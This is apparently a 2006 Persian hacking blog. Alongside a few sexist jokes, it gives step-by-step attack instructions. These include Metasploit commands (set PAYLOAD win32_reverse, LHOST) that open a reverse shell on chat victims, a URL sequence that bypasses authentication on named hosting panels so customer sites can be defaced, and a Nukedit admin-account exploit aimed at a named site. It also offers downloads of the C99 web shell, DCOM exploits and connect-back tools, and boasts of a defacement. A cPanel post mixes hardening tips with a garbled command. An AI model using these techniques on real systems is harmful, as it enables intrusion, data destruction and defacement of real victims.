تبليغاتX
امنیت و شبکه

امنیت و شبکه

زنگ تفریح...

سلام .دوستان گفتم واسه زنگ تفریحتون چند تا جک دسته اول که خودم واستون از چند صد تا جک انتخاب کردم بزارم شما برین بخونین و حالی به حولی . نظرم اگه دادین خدا خیرتون بده. الهی پیر بشی.

  راننده زن را چطور بشناسيم 1) اگه ماشينش پنچر بشه كاپوت ماشين رو بالا ميزنه و توي ماشينو نگاه ميكنه! 2) اگه راهنماي چپ رو بزنه و سمت راست بپيچه! 3) وقتي پشت سرش باشي و چراغ بزني يا بوق بزنيتوي آينه رو نگاه كنه تازه يادش مياد كه روسريش رو بايد درست كنه

زندگي تفسير سه کلمه است :خنديدن. بخشيدن وفراموش کردن پس.. بخند.. ببخش ...و فراموش کن

قزوینیه عروسی میکنه توی کارت عروسیش می نویسه: آوردن اطفال الزامیست.

......::: اگه قشنگ بود بگین تا بازم بدم بهتون :::.....

 

+ نوشته شده در  جمعه سی ام تیر 1385ساعت 21:14  توسط پیام ایزدی  | 

هک از طریق چت بدون ازسال فایل...

در متدی جدید که با باگ موجود در Windows Fax Viewer کار می کند . شما لینکی برای قربانی در چت روم می فرستید و بعد از کلیک کردن آن لینک توسط قربانی به شما از وی Shell ( قابلیت کنترل کامل کامپیوتر وی) میگیرید نوع Shell در این روش از نوع Reverse می باشد و فابلیت عبور از ّFirewall را دارا ست .ابزار لازم در این کار همان Metasploit است که مجموعه باگ هاو ابزار های نفوذ می باشد که قبلآ نحوه ی کار و دستورات آن در سایت آموزش داده شده لینک دریافت -  لینک اموزش کار توجه : اگر قبلآ نسخه Metasit framework-2.4 را دریافت کرده اید این باگ هنوز به آن اضافه نشده و شما بایستی در پوشه برنامه MSFupdate را بزنید تا باگ های جدید مانند ie_xp_pfv_metafile به آن اضافه شود. برای کنترل صحت update می توانید بعد از اجرای برنامه دستور show exploits را بزنید و لیست باگ ها را مشاهده و با دستور use از آن ها استفاده کنید بنابراین تایپ می کنید use ie_xp_pfv_metafile حال شما این exploit را اجرا کرده اید و بایستی یک سری مقادیر را به برنامه بدهید مانند ip شما و پورت کاربردی . نوع سیستم عامل قربانی . نوع payload (ارتباط ) . دراین با فرض اینکه ip من http://217.216.30.40 باشد به برنامه مقدار دهی میکنم . بزنید set TARGET 0 و بعد آن
بزنید set PAYLOAD win32_reverse و بعد ان
بزنید set HTTPHOST 217.216.30.40 و بعد آن
بزنید set LHOST 217.216.30.40
و در آخر بزنید exploit . حال برنامه یک لینک از ip شما به شما می دهد که در اینجا به من لینک http://217.216.30.40:8080 را می دهد و منتظر ارتباط با قربانی می ایستد . با کلیک قربانی روی این لینک شما در این برنامه shell از سیستم وی را مشاهده خواهید نمود .شما در این shell قادر به اجرای همه گونه فرمان بر روی سیستم قربانی می باشید به طور مثال Format یک درایو و پاک کردن فایل ها توسط دستورات dos. و انگار از سیستم قربانی وارد cmd شده اید . برای ارسال و گرفتن فایل هم می توانید به مقاله ی آموزشی که در سایت قرار داده شده رجوع کنید لینک اموزش ارسال فایل در shell با tftp
بابا ما این اموزش های باحال و میدیم اونوقت شما....درضمن دو تا لینک بالا که گزاشتم که نرم افزار ورژن جدید و کار با اون هست رو هر کی بخواد باید نظرات وبلاگ بره بالا اولا دوما به طرف میل میدم برنامش و اخه رو همه سیستم ها کار میکنه واسه همین مفتی بگیرین خطر ناکه...
+ نوشته شده در  چهارشنبه بیست و هشتم تیر 1385ساعت 18:1  توسط پیام ایزدی  | 

جواب یکی از بچه ها..

شنبه 24 تير1385 ساعت: 16:27 توسط:ساسان
فیلمت کار نمیکنه

این اکسپولیتی هم که گذاشتی چطوری باهاش کار کنیم
حداقل یه مقاله تصویری واسه درسترسی روت کرفتن با این شل از سرور بزار که با داشتن یه یوزر اف تی پی از یه سرور بتونم کل سایت های روی سرور رو دیفیس کنیم دمت گرم
 سلام بچه ها یه نظری بدین و اینم واسه اقا سامان يك كليپ كامل به همراه كليه اكسپلويتهاي مورد نياز براي در اختيار گرفتن يك سرور .....

در اين كليپ 5 دقيقه اي شما با نحوه استفاده از يك باگ و چند اكسپلوت مختلف را فرا ميگيريد كه با استفاده از انها ميتوانيد يك سرويس دهنده لينوكس را بطور كامل در اختيار بگيريد.
در اين كليپ آموزشي براي دسترسي اوليه از يك باگ اجراي دستور از راه دور(Remote Command Execute) كه در سيستم مديريت محتواي يكي از سايتهاي روي سرويس دهنده وجود داشت و به دليل بي توجهي يا تنبلي يك مسئول سايت سيستم مديريت محتواي سايت بروز نشده بود استفاده شده و با كمك يك اسكريپت اجراي دستورات درستورات دلخواه نفوذگر در سيستم هدف اجرا ميشود . سپس با استفاده از يك Connect Back سيستم هدف به سيستم نفوذگر مرتبط ميشود و نفوذگر نيز با قرار دادن اكسپلويت لازم در سيستم هدف و اجراي آنها دسترسي خود را به root افزايش ميدهد.
اميدواريم تا براي شما دوستان مفيد باشد.

دريافت كليپ آموزشي

دريافت اكسپلويت brk_xpl

دريافت ابزار Connect Back

دريافت يك ابزار ديگر براي Connect Back
نظر بدین نامردا .................
+ نوشته شده در  شنبه بیست و چهارم تیر 1385ساعت 17:39  توسط پیام ایزدی  | 

چند تا چیز باحال...

با سلام.دوستان اول ممنونم که نظر میدین و فوش میدین و بعدشم اینکه واسم مهم نیست که فلانی بیاد به من بگه لمر و اون یکی دیگه یه چرت دیگه بندازه جالبشم اینجاس ادرس سایت یا ملشونم نمیزارن...خوب بگزریم حالا جواب چند تا از بچه ها رو میدم.دوستان اگر شما اموزش پیشرفته میخواین با برنامه های پیشرفته باشه از نظر من ملالی نیست ولی من اینجا قسط داشتم اموزشایی بزارم که همه استفاده کنن ولی یه کمم پیشرفتش میکنم. خوب این C99 Shell واسه اونایی که میخوان رو سرور شل بگیرن عمرا اگر جایی دیده باشین این و بزارن . نمیخوام خودم و بالا ببرم ولی نامردیه اموزش اپلود شل بدیم بعد بیایم و خود شل رو نزاریم یا شلی بزاریم که کار نکنه...یه چیز مامان دیگه هم گزاشتم بگیرینشون.تا بعد .نظر یادتون نره دوستان.مرسی.

C99

sniffing-around-a-switch

+ نوشته شده در  چهارشنبه بیست و یکم تیر 1385ساعت 16:52  توسط پیام ایزدی  | 

سه سوته دیفیس کن ...

سلام . فقط بگم اون لاشی که اومده پی ام داده و زر زده که میگه من اشیانه رو با باگ ویندوز زدم اخه لاشی اولا اشیانه لینوکس بود و بعدشم تو که از هک چیزی حالیت نیست خواهش نیا واسه من کس کس کن .ممنونم در ضمن این اموزش و دارم میدم اگر بخونین و نظر ندین الاهی که حرومتون بشه اخه این دیگه خیلی مامانه...

چندتا سرور هاستینگ کنترلر که میشه به راحتی سایتاشا دیفیس کرد.
قدم به قدم اونجوری که من میگم عمل کنید.به یکی از صفحات زیر برید:

http://web012.webspace4you.ch/hc
http://web013.webspace4you.ch/hc
http://web014.webspace4you.ch/hc
http://web015.webspace4you.ch/hc
http://web016.webspace4you.ch/hc
سپس اینو جلوش بنویسید:
hosting/dsp_newreseller.asp
برای مثال:
http://web013.webspace4you.ch/hc/ho...newreseller.asp
بعد از اینکه ارور را دیدید :hosting/dsp_newreseller.asp را از جلو سایت بردارید و hosting/creditlimit.asp/ را جلوش بنویسید .اینجوری:
http://web013.webspace4you.ch/hc/ho...creditlimit.asp
حالا شما وارد شدید .webspace4you را انتخاب کنید وset credit limit را بزنید .در اینجا شما میتونید با زدن تیکChange Password Also یه پسورد جدید انتخاب کنید.حالا به صفحه اصلی سایت برید .مثلا:
http://web013.webspace4you.ch/hc/
و با یوزر نیم و پسوردی که ساختید لوگین کنید.وقتی وارد شدید.folder manager و سپسlist folder را بزنید.لیست سایتا را میبینید.یکی از سایتا را انتخاب کنیدو پوشهwww را پیدا کرده وراحت صفحه index را پیدا کرده و فول دیفیس کنید.
مشکلی داشتید همینجا بپرسید. چند تا دیگه سرورم پیدا کردم که به همین شیوه میشه دیفیس کرد:
http://clients5.nevidia.com/hcadmin/
http://www.privatehosting.net:8077/
http://hotelhomere.com

نظر فراموش نشه....

+ نوشته شده در  سه شنبه بیستم تیر 1385ساعت 3:57  توسط پیام ایزدی  | 

هک شدن اشیانه...

با سلام. در پروژه جدید من و دوست خوبم امیر چون با اشیانه یه خورده حسابایی داشتیم تونستیم سرور اشیانه رو بخابونیم ولی از بد شانسی ما نیما Q7X حضور داشت و مانع از موندن صفحه دیفیس شد. ولی مهم این هست که از اکسپلویت کشف شده توسط ما روی این سرور امتحان شد و جواب داد و چون دیفیس شدن سایت در عرض ... بود نتونستیم سرور را به کلی بخوابونیم ولی از اساتید اشیانه و کسانی که ادعای امنیت دارن درخواست میشه فکر نکنن همه چیز بلدن چون دست روی دست زیاد است و بزودی هم سرور های بیشتری توسط ما زده خواهد شد. به امید اونروزی که به فکر امنیت باشیم نه به فکر کلاس های هک و کسب درامد های چرند و بیخود.... با تشکر : پیام ایزدی و امیر موسوی

 ID:God.Hacked@Yahoo.Com                                  ID:t0rb4t_t34m@Yahoo.Com

لینک عکس دیفیس شدن سایت اشیانه: صفحه دیفیس اشیانه

+ نوشته شده در  شنبه هفدهم تیر 1385ساعت 19:59  توسط پیام ایزدی  | 

اگسپولیت برای ویندوز....

سلام . یکی از دوستان یک باگ واسه Dcom و حمله به ویندوز سرویس پک 2 میخواست منم براش گزاشتم . هر کی سوال داره یا چیزی میخواد بگه.در ضمن امار وبلاگ پایین وبلاگ سمت چپ یک عدد فقط نوشته اونجاس به اشتباه  نگرید

Exploit 1

Exploit 2

+ نوشته شده در  جمعه شانزدهم تیر 1385ساعت 22:40  توسط پیام ایزدی  | 

چگونه به يک پورت Telnet کنيم؟

برای اينکه عملکرد يک پورت برای شما روشن شود، بايد به آن پورت Telnet کنيد. (البته معمولا تعدادی از پورت‌هايی را که ممکن است اطلاعاتی مهم را در اختيار هکر‌ها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنها شايد برقرار نشود.) برای telnet کردن در command prompt دستور زير را تايپ کنيد:
telnet hostname portnum
در اين دستور به‌جای hostname شماره ip و يا نام سايت را وارد می‌کنيد و به‌جای portnum شماره پورت و يا معادل آن از جدول. مثلا برای تلنت کردن به پورت ۱۳ که ساعت و تاريخ را به‌دست می‌دهد در کامپيوتری به‌ اسم www.iums.ac.ir مي‌نويسيد:
telnet iums.ac.ir 13
telnet iums.ac.ir daytime
هر دو اين دستورات معادل هم هستند.
تلنت کردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام می‌دهد، زيرا بعضی از پورت‌ها در صورت بسته نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند.
همين الان شروع کنيد و مثل يک هکر واقعی به کامپبوتر‌های مختلف و پورت‌های گوناگون تلنت کنيد. مخصوصا اگر پورت ۷۹ (finger) روی يک کامپيوتر باز بود، مرا هم خبر کنيد (-;

◊ تقسيم‌بندی انواع حملات

اولين نکته‌ای که لازم است بگويم اينه که وقت خود را برای هک کردن کامپيوتر‌های کلاينت هدر ندهيد (اگرچه برای افراد مبتدی کار با نرم‌افزاری مثل Sub7 زياد هم بد نيست ولی نبايد زياده‌روی کرد) علت هم اينه که هربار که به اينترنت وصل می‌شوند ip جديدی به‌ آنها اختصاص پيدا می‌کنه و زحماتتون هدر می‌ره (البته برای جلوگيری از اين امر هم روشهايی هست که در آينده ايشالله ميگم).
حالا تقسيم‌بندی:
۱- حمله به روش Denial of Service Attack) DoS)
۲- حمله به روش Exploit
۳- حمله به روش Info Gathering (تلنت کردن يکی از مثالهای آن است که امروز آموختيد)
۴- حمله به روش Disinformation
+ نوشته شده در  یکشنبه یازدهم تیر 1385ساعت 2:44  توسط پیام ایزدی  | 

سوال داری؟

با سلام خدمت دوستان عزیزم. من اومدم بگم تصمیم گرفتم به سوالات دوستان جواب بدم اگر کسی سوالی داره یا اموزش خاصی میخواد بگه تا براش بزارم اخه من باید بدونم چی میخواین تا براتون بزرام؟پس هر کی میخواد بگه تا واسش بزارم.تا بعد.

 

+ نوشته شده در  جمعه نهم تیر 1385ساعت 23:21  توسط پیام ایزدی  | 

هک کردن سایت های Nukedit

برنامه Nukedit که توسط دوست خوبم Arashps نوشته شده است البته اینم بگم این دوستم باهاش کلکل کردم اخه با اسم پیام مخالف بود.مسخرس مگه نه؟
این برنامه برای شما یه اکانت در سطح ادمین در این برنامه میسازه و شما با رفتن به قسمت www.site.com/.../utilities/login.asp میتونید با اکانتی که برنامه براتون ساخته وارد بشید و دسترسی شما هم در سطح ادمین خواهد بود. فقط توجه کنید که در برنامه فولدر nukedit رو وارد کنید و utilities و از اون به بعد
را وارد نکنید.



مثال: http://www.gren.dk یکی از سایتهایی هست که این باگ رو داره. در این سایت nukedit در صفحه اصلی سایت فعاله و تو فولدر دیگه ای نیست و این آدرس موجود هست رو سایت : http://www.gren.dk/utilities/login.asp
همونطور که بالا هم گفتم utilities و از اون به بعد رو لازم نیست وارد برنامه کنید و فقط تا فولدر nukedit رو وارد میکنیم که در این سایت رو فولدر اصلی سایت هست پس :
1. http://www.gren.dk رو در برنامه وارد میکنیم
2.username هرچی خواستیم میزنیم مثلا abcd پسورد و ایمیل هم رو هم وارد میکنیم
3.روی create account کلیک میکنیم و چند لحظه استراحت میکنیم تا برنامه اعلام کنه اکانت ساخته شد یا شایدم بگه سایت مورد نظر آسیب پذیر نیست .
4. بعد این که اکانت ساخته شد به قسمت login.asp که در این سایت آدرسش http://www.gren.dk/utilities/login.asp هست میریم و با اون ایمیل و پسوردی که اکانت ساختیم وارد میشیم .نظر یادت نره.نویسنده:پیام ایزدی وبسایت:WwW.Expolit.Net.Tf

دانلود نرمافزار مورد نظر

+ نوشته شده در  جمعه نهم تیر 1385ساعت 16:59  توسط پیام ایزدی  | 

About Cpanel Bug

خوب فکر کنم تا الان همگي راجب باگ کنترل پنل چيزهايي رو شنيده باشيد و حتي اينم شنيديد که گروه قبلي من به وسيله همين  200چند تا سايت رو هک کردبا همين باگ بود خوب امروز ميخوام يکم راجب کار اين باگ توضيح بدم و اميد وارم که بدرد بخوره و بدرد من که زياد خورد چون تونستم راحت به يک آي اس پي با اين باگ نفوذ کنم  ولي يادتون نره اين اموزش ها همه به وسيله من يعني پيام از تربت نوشته شده و دوست ندارم بدون ذكر منبع اونا رو پخش كنيد ممنون .خوب همونطور که همه هم ميدونن هر روز شاهد هک شدن سرور هاي بزرگ ايراني هستيم و همه در فکرن آيا که ميشه جلوي اين همه ضرر رو گرفت؟ خوب چرا وقتي که ميتونيم با کمي وقت صرف کردن و با استفاده از علم هکران جلوي اين حملات رو بگيريم و از خسارتهاي مادي و معنوي آن جلوگيري کنيم اين کار رو انجام نميديم؟ هر روز چندين باگ و اکسپلويت کشف ميشه که من و شما از اونها بيخبريم مبحث امنيت چيزي نيست که با يک مدرک ساده اي امنيت شبکه بتوان گفت توانايي کامل در اين زمينه رو دارا هستيم الان به يک سري از توصيه هاي امنيتي اشاره ميکنم که توسط گروه اسکوئد ارائه شده . براي اينکه مطمئن بشيد که سرور شما داراي باگ کنترل پنل هست يا نه به آدرس زير بريد و اين فايل رو روي سرور خود اجرا کنيد

http://64.240.171.106/cpanel.php

اين در واقع يک لوکال اکسپلويت است که بر پايه پرل نوشته شده و يکي از خطرناک ترين باگهاي آن دسترسي از طريق نو بادي شل به يوزر هاي ديگر است يعني ميتوانيد تنها با داشتن يک اکونت اف تي پي از يک سرور به کل سايتهاي روي اون سرور دسترسي داشته باشيد حتي ميتونيد به عنوان يک قرباني از اون استفاده کنيد و اهداف خود رو از طريق اون سرور انجام بدهيد . متاسفانه کنترل پنل به صورت دفالت با ماژوئل زير

Mod_PHP

کار ميکند بنابراين اکثر سرويس دهنده هاي لينوکس داراي اين مشکل هستند اين ماژوئل امکان دسترسي يک يوزر را به ديگر يوزرهاي سرور با استفاده از

را ميدهدUID-Min (Uid>-100)

براي رفع اين مشکل بايد آپاچي را دوباره بر پايه

ساختMod_Phpsuexec

بويلد هم اکنون تمام کنترل پنل ها از جمله کارنت و رله آيس و استابلس و حتي کنترل پنل 9.3 داراي اين مشکل هستند . همچنين سيستم عاملهاي ردهت و فري بي اس دي و فدورا و انترپايز لينوکس داراي اين مشکل هستند. به طور کلي وقتي

mo_-php

فعال است تمام اسکريپت هاي پي اچ پي با همان کاربر دفايلت وب سرور (نو بادي ) انجام ميشود. اين به يوزر ها اين امکان رو ميده که هر اسکريپتي که بخواهند براي سرور اجرا کنند و اين براي سرورهايي که بيش از يک اکانت دارا ميباشد و نميخواهند يوزر ها به محدوده همديگر دسترسي داشته باشند خطرناک است (به طور کلي وب سرورها) متاسفانه

MOD-PHP

به صورت پيش فرض بر روي کنترل پنل نصب ميشود (و اين مشکل بزرگي است) البته توجه داشته باشيد اين يک باگ يا اکسپلويت نيست در واقع يک سرويس عادي و طبيعي و مخصوص

mo_-php

است که نميتوان آن را منع کرد مگر با تبديل آن به

PHPSUEXCE

با اين حال باز هم

SUEXCE

که همراه کنترل پنل ارائه ميشود اجازه اجراي کنترل ناشدني يک سري اسکريپت ها را به يوزر ها ميدهد که اين با

SUEXCE

ارائه شده در خود آپاچي متفاوت است. کنترل پنل براي رفع اين مشکل پتچي ارائه کرده است: مثال زير

(home/cpapachebuild/buildapache/suexec.patch)

اين پتچ فقط اجازه اجراي اين اسکريپتها را براي يوزر هاي مخصوص

Root,Wheel

را ميدهد . فقط مشکلي دارد که اجازه اجراي شارد اسکريپت را در صورتي که دايرکتوري اصلي آن داراي اجازه رايت براي يوزرها و گروپ هاي ديگر داشته باشد.علاوه بر اين همچنان يکسري اسکريپتهاي پرل و سي جي آي وجود دارد که داراي قابليت اکسپلويت شدن ميباشند براي مثال

/usr/local/cpanel/bin/proftodvhosts

/usr/local/cpanel/cgi-sys/addalinh.cgi

/usr/local/cpanel/cgi-sys/gustbook.cgi

/usr/local/cpanel/cgi-sys/mchat.cgi

...

براي اطمينان از وجود اين اکسپلويتها بر روي سرور خود اين دستور رو اجرا کنيد

Root@server01>find/usr/local / cpanel-user root-group wheel-type f-perm+ 1/ xargs-I echo 'head-1{}/ grep - q per / && head - 1{}/ grep-q-r-e-T&& Is - 1{}1 / sh

خوب اگر با اجراي اين دستور هيچ پيغامي دريافت نکرديد يعني که سرور شما کاملا در برابر اين اين نکات سسور است همچنين ميتوانيد از طريق اين لينک سرور خود رو تست کنيد

http://64.240.171.106/cpanel.php

اين اسکريپت سرور شما رو در برابر چندين

vulnerability

تست ميکند. اين فايل يکسري پي اچ پي اسکريپت با يک يوزر معمولي اجرا ميکند که باعث اجرا شدن فايل اصلي

test.pl

ميشود . ميتوانيد از اين اطلاعات کامل درباره اين تستر دريافت کنيد

http://www.a-sqvad.co/audit

اگر سايتها هر کدوم روشي رو واسه پتچ کردن اين باگها ارائه کردند ولي اکثرا کامل نيستند و يا داراي ايراد هستند . در زير به چند روش اشاره ميکنم

بهترين کار (که باعث از بين رفتن مشکلات ديگر نيز ميشود) تغيير ماژوئل پي اچ پي از

mod-php

به

mod-phpssexec

ميباشد راه اول : آپاچي را کامپايل کنيد و راه دوم

/script/easyapache

ولي مواظب باشيد بسياري از پرميسيون ها و آونر شيپس ها بر پايه پي اچ پي اسکريپت است و اين کار شما ممکن است باعث ايجاد اختلال در بعضي سايتها شود. اين کار رو با مسئوليت خودتون انجام بديد بعدا منو درگير اين ماجرا نکنيد.

فايل پتچ رو پاک کنيد بعد از اجراي بويلد آپاچي

نويسنده:پيام ايزدي                   وبسايت:WwW.Expolit.Net.Tf

+ نوشته شده در  پنجشنبه یکم تیر 1385ساعت 17:7  توسط پیام ایزدی  |